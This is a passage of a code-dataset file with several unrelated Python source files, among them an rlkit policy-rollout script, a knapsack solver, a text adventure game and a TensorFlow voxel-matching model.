logger\n\nfilename = str(uuid.uuid4())\n\nfrom rlkit.torch.sac.policies import TanhGaussianPolicy,GaussianPolicy, MakeDeterministic\n\ndef simulate_policy(args):\n data = pickle.load(open(args.file, \"rb\"))\n policy_key = args.policy_type+'/policy'\n if policy_key in data:\n policy = data[policy_key]\n else:\n raise Exception(\"No policy found in loaded dict. Keys: {}\".format(\n data.keys()\n ))\n\n env_key = args.env_type + '/env'\n if env_key in data:\n env = data[env_key]\n else:\n raise Exception(\"No environment found in loaded dict. 
Keys: {}\".format(\n data.keys()\n ))\n\n if isinstance(env, RemoteRolloutEnv):\n env = env._wrapped_env\n print(\"Policy loaded\")\n\n if args.enable_render:\n # some environments need to be reconfigured for visualization\n env.enable_render()\n if args.gpu:\n ptu.set_gpu_mode(True)\n if hasattr(policy, \"to\"):\n policy.to(ptu.device)\n if hasattr(env, \"vae\"):\n env.vae.to(ptu.device)\n\n if args.deterministic:\n policy = MakeDeterministic(policy)\n\n if args.pause:\n import ipdb; ipdb.set_trace()\n if isinstance(policy, PyTorchModule):\n policy.train(False)\n paths = []\n while True:\n paths.append(rollout(\n env,\n policy,\n max_path_length=args.H,\n render=not args.hide,\n ))\n if args.log_diagnostics:\n if hasattr(env, \"log_diagnostics\"):\n env.log_diagnostics(paths, logger)\n for k, v in eval_util.get_generic_path_information(paths).items():\n logger.record_tabular(k, v)\n logger.dump_tabular()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('file', type=str,\n help='path to the snapshot file')\n parser.add_argument('--H', type=int, default=100,\n help='Max length of rollout')\n parser.add_argument('--speedup', type=float, default=10,\n help='Speedup')\n parser.add_argument('--policy_type', type=str, default='evaluation')\n parser.add_argument('--env_type', type=str, default='evaluation')\n parser.add_argument('--gpu', action='store_true')\n parser.add_argument('--pause', action='store_true')\n parser.add_argument('--deterministic', action='store_true')\n parser.add_argument('--hide', action='store_true')\n parser.add_argument('--enable_render', action='store_true')\n parser.add_argument('--log_diagnostics', action='store_true')\n parser.add_argument('--gaussian_policy', action='store_true')\n args = parser.parse_args()\n import ipdb; ipdb.set_trace()\n simulate_policy(args)\n","sub_path":"scripts/sim_policy.py","file_name":"sim_policy.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"490946528","text":"def getArchivoCompleto():\n try:\n archivo = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\stock.txt\",\"rt\")\n salidaCompras = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaCompras.txt\",\"wt\")\n salidaVentas = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaVentas.txt\",\"wt\")\n for linea in archivo:\n try:\n # si el if es true es un registro de ventas\n if(int(linea[11:14])):\n salidaVentas.write(linea)\n # si entra en la excepcion es porque es un registro de compras\n except ValueError:\n salidaCompras.write(linea)\n except IOError:\n print(\"Imposible abrir el archivo\")\n finally:\n archivo.close()\n salidaCompras.close()\n salidaCompras.close()\n\n\ndef salidaCompras():\n lista = []\n try:\n archivo = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaCompras.txt\",\"rt\")\n # hasta -1 para quitar el salto de linea\n for linea in archivo:\n lista.append(linea[:-1])\n except IOError:\n print(\"Imposible abrir el archivo de compras\")\n finally:\n archivo.close()\n return lista\n\n\nif __name__ == \"__main__\":\n getArchivoCompleto()\n listaCompras = salidaCompras()\n print(listaCompras)","sub_path":"Programacion-I/Final-Previo/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"409301661","text":"def knapsack(n, C, 
memo):\n    # w (item weights) and v (item values) are assumed to be module-level lists\n    if (n, C) in memo:\n        return memo[(n, C)]\n\n    if n == 0 or C == 0:\n        result = 0\n    elif w[n] > C:\n        result = knapsack(n - 1, C, memo)\n    else:\n        # do not put the item in the knapsack\n        tmp1 = knapsack(n - 1, C, memo)\n\n        # put the item in the knapsack\n        tmp2 = v[n] + knapsack(n - 1, C - w[n], memo)\n        result = max(tmp1, tmp2)\n\n    memo[(n, C)] = result\n    return result\n","sub_path":"knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"455104468","text":"import numpy as np\n\n\ndef normalize(A):\n    sum = np.sum(A, 0)\n    V = A.shape[0]\n    D = np.zeros((V, V))\n    for i in range(V):\n        if sum[i] > 0:\n            D[i, i] = 1.0 / sum[i]\n    return np.dot(A, D)\n\ndef main():\n    H = 16\n    W = 8\n    V = H * W\n    len_t = 24 * (31 + 31 + 30)\n    K = 9\n    label = np.load('../poi/regular_label_.npy')\n    label = np.tile(label, (V, 1)).transpose()\n    adj_mat = np.load('path_bike_nyc_regular.npy')\n\n    sum = np.zeros((24 * 2, V, V), dtype=np.float32)\n    A = np.zeros((24 * 2, V, V, K + 1), dtype=np.float32)\n    eye = np.eye(V)\n    neg_eye = 1 - eye\n    holiday = [i for i in range(1, 93, 7)] + [i for i in range(2, 93, 7)] + [4, 66]\n    for day in holiday:\n        sum[24:48, :, :] += adj_mat[(day - 1) * 24: day * 24, :, :]\n    for t in range(24):\n        sum[t, :, :] = np.sum(adj_mat[t:len_t:24, :, :], axis=0) - sum[24 + t, :, :]\n        adjacency = sum[t, :, :]\n        normalized_adjacency = normalize(adjacency.transpose() * neg_eye)\n        A[t, :, :, 0] = eye\n        for k in range(K):\n            A[t, :, :, 1 + k][label == k] = normalized_adjacency[label == k]\n    for t in range(24, 48):\n        adjacency = sum[t, :, :]\n        normalized_adjacency = normalize(adjacency.transpose() * neg_eye)\n        A[t, :, :, 0] = eye\n        for k in range(K):\n            A[t, :, :, 1 + k][label == k] = normalized_adjacency[label == k]\n    np.save('regular_path.npy', A)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"path/path_regular.py","file_name":"path_regular.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"314060641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n__author__ = 'City10th'\n'Variable-related'\n\nimport os,sys\n\n\n# path class for a specific app\nclass apppath(object):\n    def __init__(self, special_app='try_auto'):\n        # cityapps path\n        self.cityapps = os.environ['cityappsHOME']\n\n        # if the user did not specify an app, try to detect the app the current script belongs to\n        if special_app=='try_auto':\n            p1 = os.path.split(os.path.abspath(sys.argv[0]))[0] # get the absolute location of the current script\n            p2 = os.path.relpath(p1, self.cityapps) # strip the cityapps path from p1\n            #p2 = p1.split(len(self.cityapps)) # strip the cityapps path from p1\n            special_app = p2.split(os.path.sep)[1]\n            if os.path.join(self.cityapps, 'apps', os.path.sep.join(p2.split(os.path.sep)[1:])) != p1:\n                print('@!@ 错误:自动获取当前app失败')\n                sys.exit(0)\n        elif special_app not in os.listdir(os.path.join(self.cityapps,'apps')):\n            print('@!@ 错误:不存在此app')\n        \n        # app name\n        self.appname = special_app\n        # app path\n        self.app = os.path.join(self.cityapps, 'apps', special_app)\n        # app module directory\n        self.module = os.path.join(self.cityapps, 'apps', special_app, 'module')\n        # app main-script directory\n        self.main = os.path.join(self.cityapps, 'apps', special_app, 'main')\n\n","sub_path":"lib/city_py_mo/var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"211586008","text":"'''\nTitle: Discontinuity\nAuthor: Haamid Mohammed\nDate Created: 
2018/09/21\n'''\nimport sys\nimport random\nimport time\n\nplay = True\nstart = 0\nlocation = \"spawn\"\npick2 = 0\npick3 = 0\npick4 = 0\npick5 = 0\ntime1 = 10\nchoice1 = 0\nchoice2 = 0\nchoice3 = 0\nchoice4 = 0\nchoice5 = 0\nchoice6 = 0\nchoice7 = 0\nchoice6 = 0\nchoice9 = 0\nchoice10 = 0\nchoice11 = 0\nchoice12 = 0\nchoice13 = 0\nchoice14 = 0\ns1 = 0\npower = 0\n\t\n\n\ndef ps(str): # Subroutine to Print Slowly\n\tfor x in str:\n\t\t\tsys.stdout.write(x)\n\t\t\tsys.stdout.flush()\n\t\t\ttime.sleep(0.01)\n\tprint(\"\") \n\ndef intro(): # The Intro\n\tglobal start\n\tprint(\"\"\"\n __ __ __ __ ___ ___ \n| \\\\ | /__` / ` / \\\\ |\\\\ | | | |\\\\ | | | | | \\\\ / \n|__/ | .__/ \\\\__, \\\\__/ | \\\\| | | | \\\\| \\\\__/ | | | \n\n\"\"\")\n\tprint(\"This game is a choose you own adventure.\")\n\tprint(\"You have to make many different choices and your outcome will change depending on the choices you make.\")\n\tprint(\"There are many ways to play the game but there are good outcomes as well as bad ones\")\n\tprint(\"Lets see how you play the game.\")\n\t\n\twhile not start == \"\":\n\t\tstart = input(\"Press enter to begin\")\n\t\n\ndef R1(): # Location 1, Where you begin\n\tglobal location\n\tglobal time1\n\tglobal s1\n\t\n\n\tif s1 == 0:\n\t\tps(\"You wake up and u see a spear next to you, and you hear a voice, it says, 'Complete the sword and beat the boss before time runs out'.\")\n\t\tps(\"You don't know what that means, so you look around.\")\n\t\tps(\"You see a forest and an open field in front of you, in the open field you see some creatures that you have never seen before and behind you there is a mountain that is too tall and steep to climb.\")\n\t\ts1 = 1\n\tps(\"Now you have to make a choice, go to the forest, go to the open field, or try to climb the mountain.\")\n\t\n\n\twhile location == \"spawn\":\n\t\tchoice1 = input(\"Forest, open field, or mountain: \")\n\t\t\n\n\t\tif choice1 == \"Forest\" or choice1 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\t\n\n\t\telif choice1 == \"Mountain\" or choice1 == \"mountain\":\n\t\t\tps(\"You tried to climb the mountain but failed to even get quarter of the way and because of that you wasted time\")\n\t\t\t#ps(\"Now you have wasted time climbing the mountain where do you want to go, the forest or the open field\")\n\t\t\ttime1 -= 1\n\t\t\n\n\t\telif choice1 == \"open field\" or choice1 == \"Open Field\" or choice1 == \"open Field\" or choice1 == \"Open field\" or choice1 == \"field\" or choice1 == \"Field\":\n\t\t\tlocation = \"plains\"\n\t\n \n\n\ndef R2(): # Location 2, The forest\n\tglobal pick2\n\tglobal location\n\tglobal time1\n\tglobal pick3\n\tps(\"The forest is heavily dense so you cant see the sky from the bottom and there seem to be some type of bioluminescent flowers around to light up the forest\")\n\t\n\n\tif pick2 == 0:\n\t\tps(\"You look around the forest and see a peculear tree and you examine it, the tree has many fruit but only some seem to be ripe.\")\n\t\tps(\"You don't know if the fruit is poisonous or not\")\n\t\tchoice2 = input(\"Do you want to pick the fruit, (there are 3 that seem ripe) (Y/N): \")\n\t\n\n\t\tif choice2 == \"Y\" or choice2 == \"y\":\n\t\t\tps(\"You hear a voice again, it says, 'This is a medicinal fruit, it will heal you in battle'\")\n\t\t\tps(\"You put the fruit in you pocket and go deeper into the forest\")\n\t\t\tpick2 = 1\n\t\n\n\t\telse:\n\t\t\tps(\"You leave the fruit and go deeper into the forest\")\n\t\t\tpick2 = 0\n\t\n\n\tif pick3 == 0:\n\t\tps(\"You see a large tree and you think it 
will be a good idea to climb it to get a better view.\")\n\t\tchoice3 = input(\"Do you wish to climb it? (Y/N): \")\n\t\t\n\n\t\tif choice3 == \"Y\" or choice3 == \"y\":\n\t\t\tps(\"You climbed the tree\")\n\t\t\tps(\"You see a castle, the open field, the mountains, and the strange sun.\")\n\t\t\tps(\"There only seems to be only a portion of the sun left, it's like someone cut a pizza slice out of the sun.\")\n\t\t\tps(\"You don't know what will happen when the sun dissapears so you now have to make a choice\")\n\t\t\tps(\"You climb down the tree and now you have to think about where to go.\")\n\t\t\tps(\"Go back to where you began, go to the open field, or to the castle\")\n\t\t\tpick3 = 1\n\t\t\n\n\t\t\twhile location == \"forest\":\n\t\t\t\tchoice4 = input(\"Go back, open field, or the castle: \")\n\t\t\n\n\t\t\t\tif choice4 == \"castle\" or choice4 == \"Castle\" or choice4 == \"The Castle\" or choice4 == \"the castle\" or choice4 == \"The castle\" or choice4 == \"the Castle\":\n\t\t\t\t\tlocation = \"castleout\"\n\t\t\n\n\t\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\t\tlocation = \"spawn\"\n\t\t\n\n\t\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\t\tlocation = \"plains\"\n\t\t\t\n\t\t\n\t\telse:\n\t\t\tps(\"You dont know where to go now since the forest seems to never end.\")\n\t\t\tps(\"Do you want to go back, keep going deeper into the forest or go to the open field\")\n\t\t\tpick3 = 0\n\t\t\t\n\t\t\twhile location == \"forest\":\n\t\t\t\tchoice4 = input(\"Go back, forest, or open field: \")\n\t\t\t\t\n\n\t\t\t\tif choice4 == \"forest\" or choice4 == \"Forest\" :\n\t\t\t\t\tps(\"You go deeper into the forest and you seem to have left from the other side of the forest.\")\n\t\t\t\t\tlocation = \"castleout\"\n\t\t\t\t\n\n\t\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\t\tlocation = \"spawn\"\n\t\t\t\t\n\n\t\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\t\tlocation = \"plains\"\n\t\t\t\n\telse:\n\t\tps(\"Go back to where you began, go to the open field, or to the castle\")\n\t\t\n\t\twhile location == \"forest\":\n\t\t\tchoice4 = input(\"Go back, the castle, or open field: \")\n\n\n\t\t\tif choice4 == \"forest\" or choice4 == \"Forest\" :\n\t\t\t\tps(\"You go deeper into the forest and you seem to have left from the other side of the forest.\")\n\t\t\t\tlocation = \"castleout\"\n\t\t\t\n\n\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\tlocation = \"spawn\"\n\t\t\t\n\n\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\tlocation = \"plains\"\n\n\n\t\n\ndef R3(): # Location 3, The plains\n\tglobal location\n\tglobal time1\n\tglobal power\n\tglobal start\n\tglobal pick5\n\tif pick5 == 0:\n\t\tps(\"You are at the open field and you see some creatures, you dont know if they are hostile or not.\")\n\t\tps(\"Do you attack them (You have the spear), approach to talk to them, or go to one of the places you have discovered\")\n\t\tchoice5 = input(\"attack, talk or leave: \")\n\n\n\t\tif choice5 == 
\"attack\" or choice5 == \"attack them\":\n\t\t\tps(\"You attacked them without holding anything back.\")\n\t\t\tps(\"You kill the creatures and some sort of power flows into you empowering you\")\n\t\t\tps(\"You try to summon this new power and you think that having a sword would be nice.\")\n\t\t\tps(\"A sword suddenly appears in your hand, the sword has no weight but it is sharper than any sword you have used before.\")\n\t\t\tps(\"You think of it becoming a bow and it slowly chapes into a bow.\")\n\t\t\tps(\"You think this is a great power to have and it will be useful in the future if you have to fight anything else.\")\n\t\t\tpower = 1\n\t\t\tvariable = 1\n\t\t\tpick5 = 1\n\n\n\t\telif choice5 == \"talk\" or choice5 == \"Talk\":\n\t\t\tps(\"They attack you, do you want to run away or fight them?\")\n\t\t\tchoice6 = input(\"Run or Fight: \")\n\t\t\n\n\t\t\tif choice6 == \"fight\" or choice6 == \"Fight\":\n\t\t\t\tps(\"You attacked them without holding anything back.\")\n\t\t\t\tps(\"You kill the creatures and some sort of power flows into you empowering you\")\n\t\t\t\tps(\"You try to summon this new power and you think that having a sword would be nice.\")\n\t\t\t\tps(\"A sword suddenly appears in your hand, the sword has no weight but it is sharper than any sword you have used before.\")\n\t\t\t\tps(\"You think of it becoming a bow and it slowly chapes into a bow.\")\n\t\t\t\tps(\"You think this is a great power to have and it will be useful in the future if you have to fight anything else.\")\n\t\t\t\tpower = 1\n\t\t\t\tvariable = 1\n\t\t\t\tpick5 = 1\n\n\n\t\t\telif choice6 == \"Run\" or choice6 == \"run\":\n\t\t\t\tchoice7 = input(\"The forest or the mountains: \")\n\t\t\n\n\t\t\t\tif choice7 == \"The Forest\" or choice7 == \"The forest\" or choice7 == \"Forest\" or choice7 == \"forest\":\n\t\t\t\t\tps(\"You lose the creatures in the forest and they go back to where they were.\")\n\t\t\t\t\tps(\"You got lucky that they arn't that smart or you wouldn't have gotten away\")\n\t\t\t\t\tps(\"You now go back to the open field \")\n\t\t\t\t\tR3()\n\n\n\t\t\t\telif choice7 == \"Mountains\" or choice7 == \"Mountain\" or choice7 == \"mountains\" or choice7 == \"mountain\" or choice7 == \"The Mountains\" or choice7 == \"The Mountain\" or choice7 == \"The mountains\" or choice7 == \"The mountain\" or choice7 == \"the Mountains\" or choice7 == \"the Mountain\" or choice7 == \"the mountains\" or choice7 == \"the mountain\":\n\t\t\t\t\tps(\"You run out of places to run and the creatures catch up with you and kill you.\")\n\t\t\t\t\tstart = 0\n\n\n\t\telif choice5 == \"leave\" or choice5 == \"Leave\":\n\t\t\tchoice7 == input(\"Where do you go.(Forest or Mountains): \")\n\t\t\n\n\t\t\tif choice7 == \"forest\" or choice7 == \"Forest\":\n\t\t\t\tlocation = \"forest\"\n\t\t\n\n\t\t\telif choice7 == \"Mountains\" or choice7 == \"Mountain\" or choice7 == \"mountains\" or choice7 == \"mountain\":\n\t\t\t\tlocation == \"spawn\"\n\t\n\n\telif pick5 == 1 and pick3 == 1:\n\t\tps(\"You think that you should probably go to the castle now\")\n\t\tchoice9 = input(\"Do you go to the castle or to another place (Castle, Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Castle\" or choice9 == \"castle\":\n\t\t\tlocation = \"castleout\"\n\n\n\t\telif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\telif pick5 == 1 and pick3 == 
0:\n\t\tps(\"You think that you should probably get a better view of the landscape by headding into the forest\")\n\t\tchoice9 = input(\"Do you go to the forest or the mountains (Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\tif variable == 1 and pick3 == 1:\n\t\tps(\"You think that you should probably go to the castle now\")\n\t\tchoice9 = input(\"Do you go to the castle or to another place (Castle, Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Castle\" or choice9 == \"castle\":\n\t\t\tlocation = \"castleout\"\n\n\n\t\telif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\telif variable == 1 and pick3 == 0:\n\t\tps(\"You think that you should probably get a better view of the landscape by headding into the forest\")\n\t\tchoice9 = input(\"Do you go to the forest or the mountains (Forest, Mountains): \")\n\t\t\n\n\t\tif choice9 == \"Forest\" or choice9 == \"forest\":\n\t\t\tlocation = \"forest\"\n\n\n\t\telif choice9 == \"Mountains\" or choice9 == \"Mountain\" or choice9 == \"mountains\" or choice9 == \"mountain\":\n\t\t\tlocation = \"spawn\"\n\n\n\n\ndef R4(): # Location 4, outside the castle\n\tglobal location\n\tps(\"You see a huge castle that has only one way to get to the doors\")\n\tps(\"There is a bridge to get to the doors but the bridge has really powerful defences\")\n\t\n\n\tif power == 1:\n\t\tps(\"You use the power you gained to create a bow and arrows.\")\n\t\tps(\"Using the bow and arrows you slowly disarm the defences until you reach the entrance to the castle.\")\n\t\tchoice10 = input(\"Do you wish to enter the castle? (Y/N): \")\n\t\t\n\n\t\tif choice10 == \"Y\" or choice10 == \"y\":\n\t\t\tlocation = \"boss\"\n\t\t\n\n\t\telif choice10 == \"N\" or choice10 == \"n\":\n\t\t\tchoice11 == input(\"Where do you want to go? (Forest or Open field): \")\n\t\t\n\n\t\t\tif choice11 == \"Forest\" or choice11 == \"forest\":\n\t\t\t\tlocation = \"forest\"\n\t\n\n\t\t\telif choice11 == \"open field\" or choice11 == \"Open Field\" or choice11 == \"open Field\" or choice11 == \"Open field\" or choice11 == \"field\" or choice11 == \"Field\":\n\t\t\t\tlocation = \"plains\"\n\t\n\n\telif power == 0:\n\t\tps(\"Seems like you need a ranged weapon to get past this bridge and your spear isnt enough to destroy the defences\")\n\t\tps(\"Where do you go now?\")\n\t\tchoice8 = input(\"Forest or Open field\")\n\n\n\t\tif choice8 == \"Forest\" or choice8 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\n\n\t\telif choice8 == \"open field\" or choice8 == \"Open Field\" or choice8 == \"open Field\" or choice8 == \"Open field\" or choice8 == \"field\" or choice8 == \"Field\":\n\t\t\tlocation = \"plains\"\n\n\n\n\ndef R5(): # Location 5, Boss room\n\tps(\"You enter the castle and you hear the voice again and it says, 'This is the boss room'.\")\n\tps(\"You see a huge open space with the boss on the other end of the room waiting for you\")\n\tps(\"The boss asks you 'Are you ready to fight me?'\")\n\tchoice13 = input(\"What is your answer to the boss's question? 
(Y/N)\")\n\n\n\tif (choice13 == \"y\" or choice13 == \"Y\") and pick3 == 0:\n\t\tps(\"You attack the boss, and after a long and hard fought fight, you beat the boss but at a cost.\")\n\t\tps(\"You lost one of your arms and you are mortally wounded\")\n\t\tps(\"Unluckily you have no way to heal yourself so you perish from internal dammage and bloodloss.\")\n\t\tstart = 0\n\n\n\telif (choice13 == \"y\" or choice13 == \"Y\") and pick3 == 1:\n\t\tps(\"You attack the boss, and after a long and hard fought fight, you beat the boss but at a cost.\")\n\t\tps(\"You lost one of your arms and you are mortally wounded\")\n\t\tps(\"Then you remember that you have the medicinal fruit that can heal you.\")\n\t\tps(\"You eat one, you have 2 left, it completely heals you and even regrows your arm.\")\n\t\tps(\"Suddenly a portal appears near the entrance and the voice says 'You have cleared this floor, take this portal to the next floor when you are ready'\")\n\t\tchoice12 = input(\"Go through the portal or stay until you are ready?(Stay or Leave): \")\n\n\n\t\tif choice12 == \"stay\" or choice12 == \"Stay\" or choice12 == \"leave\" or choice12 == \"Leave\":\n\t\t\tps(\"This is the end of part 1, stay tuned for the release of part 2\")\n\t\t\tps(\"Thankyou for playing Discontinuity!\")\n\t\t\tsys.exit()\n\n\n\telif choice13 == \"n\" or choice13 == \"N\":\n\t\tps(\"You answer the boss that you are not ready to fight him yet.\")\n\t\tps(\"The boss says 'Come back when you are ready'.\")\n\t\tps(\"You leave the castle and cross the bridge and it seems that the defences are active again.\")\n\t\tchoice14 == input(\"Where do you want to go? (Forest or Open field): \")\n\t\n\n\t\tif choice14 == \"Forest\" or choice14 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\n\n\t\telif choice14 == \"open field\" or choice14 == \"Open Field\" or choice14 == \"open Field\" or choice14 == \"Open field\" or choice14 == \"field\" or choice14 == \"Field\":\n\t\t\tlocation = \"plains\"\n\n\n\n# Code starts here\nwhile play:\n\tintro()\n\n\twhile start == \"\":\n\t\tif location == \"spawn\":\n\t\t\tR1()\n\t\telif location == \"forest\":\n\t\t\tR2()\n\t\telif location == \"plains\":\n\t\t\tR3()\n\t\telif location == \"castleout\":\n\t\t\tR4()\n\t\telif location == \"boss\":\n\t\t\tR5()\n\t\tif time1 <= 0:\n\t\t\tps(\"You hear the voice again and it says 'Time is up, the shadow soldiers have been released'.\")\n\t\t\tps(\"Immidiately you see many shadow creatures surround you and they can manipulate their bodies like whips.\")\n\t\t\tps(\"They attack you and eveytime they hit you, it gives you a really bad burn.\")\n\t\t\tps(\"You slowly die of excruciating pain, it feels like getting burned alive.\")\n\t\t\tstart = 0\n\t\ttime1 -= 1\n\trestart = input(\"Do you wish to try again? 
(Y/N): \")\n\tif restart == \"Y\" or restart == \"y\" or restart == \"\": #resets all variables\n\t\tstart = 0\n\t\tlocation = \"spawn\"\n\t\tpick2 = 0\n\t\tpick3 = 0\n\t\tpick4 = 0\n\t\tpick5 = 0\n\t\ttime1 = 10\n\t\tchoice1 = 0\n\t\tchoice2 = 0\n\t\tchoice3 = 0\n\t\tchoice4 = 0\n\t\tchoice5 = 0\n\t\tchoice6 = 0\n\t\tchoice7 = 0\n\t\tchoice6 = 0\n\t\tchoice9 = 0\n\t\tchoice10 = 0\n\t\tchoice11 = 0\n\t\tchoice12 = 0\n\t\tchoice13 = 0\n\t\tchoice14 = 0\n\t\ts1 = 0\n\t\tpower = 0\n\n\telse:\n\t\tps(\"Thankyou for playing Discontinuity!\")\n\t\tsys.exit()","sub_path":"Discontinuity.py","file_name":"Discontinuity.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"511695016","text":"import struct\ndef main():\n file=open('binFile','wb')\n s1='王涛'.encode('utf-8')\n s2='机械11'.encode('utf-8')\n print(len(s1))\n print(type(s1))\n print(s1,s2)\n byte=struct.pack('!6s8si',s1,s2,128)\n print(byte)\n file.write(byte)\n file.close()\n\n file=open('binFile','rb')\n a,b,c=struct.unpack('!6s8si',file.read(18))\n file.close()\n print(a.decode('utf-8'),b.decode('utf-8'),c)\n \nmain() #执行主函数\n","sub_path":"python学习示例/字节序列实例.py","file_name":"字节序列实例.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310222672","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n\nimport sys\nimport os\nimport tensorflow as tf\n\nfrom config import cfg\nfrom utils import *\n\nfrom model.vfe_layer import FeatureNet\nfrom model.conv_middle import MiddleConv\nfrom model.grouping import SoftmaxGroup\n\nclass VoxelGridMatch(object):\n\n def __init__(self, group_num, single_batch_size=2, learning_rate=0.001, max_gradient_norm=5.0, avail_gpus=['0']):\n\n # Tune some hyperparameters\n self.single_batch_size = single_batch_size\n self.learning_rate = tf.Variable(float(learning_rate), trainable=False, dtype=tf.float32)\n self.global_step = tf.Variable(1, trainable = False)\n self.epoch = tf.Variable(0, trainable=False)\n self.epoch_add_op = self.epoch.assign(self.epoch + 1)\n self.avail_gpus = avail_gpus\n self.group_num = group_num\n # Piecewise constant learning rate\n boundaries = [80, 120]\n values = [ self.learning_rate, self.learning_rate * 0.1, self.learning_rate * 0.01 ]\n lr = tf.train.piecewise_constant(self.epoch, boundaries, values)\n\n # build graph\n self.is_train = tf.placeholder(tf.bool, name='phase')\n\n # Fill in more missing\n self.vox_feature = []\n self.vox_number = []\n self.vox_coordinate = []\n self.label = []\n self.descriptor_output = []\n self.prob_output = []\n self.opt = tf.train.GradientDescentOptimizer(lr)\n # Do I need this?\n self.gradient_norm = []\n self.tower_grads = []\n with tf.variable_scope(tf.get_variable_scope()):\n for idx, dev in enumerate(self.avail_gpus):\n with tf.device('/gpu:{}'.format(dev)), tf.name_scope(('gpu_{}').format(dev)):\n\n # Network structure\n feature = FeatureNet(training=self.is_train, batch_size=self.single_batch_size)\n middle = MiddleConv(input=feature.outputs, training=self.is_train)\n grouping = SoftmaxGroup(input=middle.outputs, num_of_groups = self.group_num, batch_size=self.single_batch_size)\n tf.get_variable_scope().reuse_variables()\n\n # input\n self.vox_feature.append(feature.feature)\n self.vox_number.append(feature.number)\n self.vox_coordinate.append(feature.coordinate)\n self.label.append(grouping.label) # How is this accessed?\n\n # output\n feature_output = 
feature.outputs\n descriptor_output = middle.outputs\n prob_output = grouping.prob_output\n\n # loss and grad what is this for\n if idx == 0:\n self.extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n # Apparently this is gradient clipping\n self.loss = grouping.loss\n \n self.params = tf.trainable_variables()\n gradients = tf.gradients(self.loss, self.params)\n clipped_gradients, gradient_norm = tf.clip_by_global_norm(\n gradients, max_gradient_norm)\n\n # I guess to save them?\n self.prob_output.append(prob_output)\n self.gradient_norm.append(gradient_norm)\n self.tower_grads.append(clipped_gradients)\n self.descriptor_output.append(descriptor_output)\n\n self.vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n\n # loss and optimizer, with clipping\n with tf.device('/gpu:{}'.format(self.avail_gpus[0])):\n self.grads = average_gradients(self.tower_grads)\n self.update = [self.opt.apply_gradients(\n zip(self.grads, self.params), global_step=self.global_step)]\n self.gradient_norm = tf.group(*self.gradient_norm)\n\n # what is this update thing\n self.update.extend(self.extra_update_ops)\n self.update = tf.group(*self.update)\n\n # some output thingy\n # Batchsize x 32\n self.descriptor_output = tf.concat(self.descriptor_output, axis=0)\n # Batchsize x Groupsize\n self.prob_output = tf.concat(self.prob_output, axis=0)\n # Batchsize x 1\n self.group_output = tf.argmax(self.prob_output, axis=1)\n\n\n # Saver\n self.saver = tf.train.Saver(write_version=tf.train.SaverDef.V2, max_to_keep=10, pad_step_number=True, keep_checkpoint_every_n_hours=1.0)\n\n self.train_summary = tf.summary.merge([\n tf.summary.scalar('train/loss', self.loss),\n *[tf.summary.histogram(each.name, each) for each in self.vars + self.params]])\n\n # Include the 32-descriptor and prediction\n self.validate_summary = 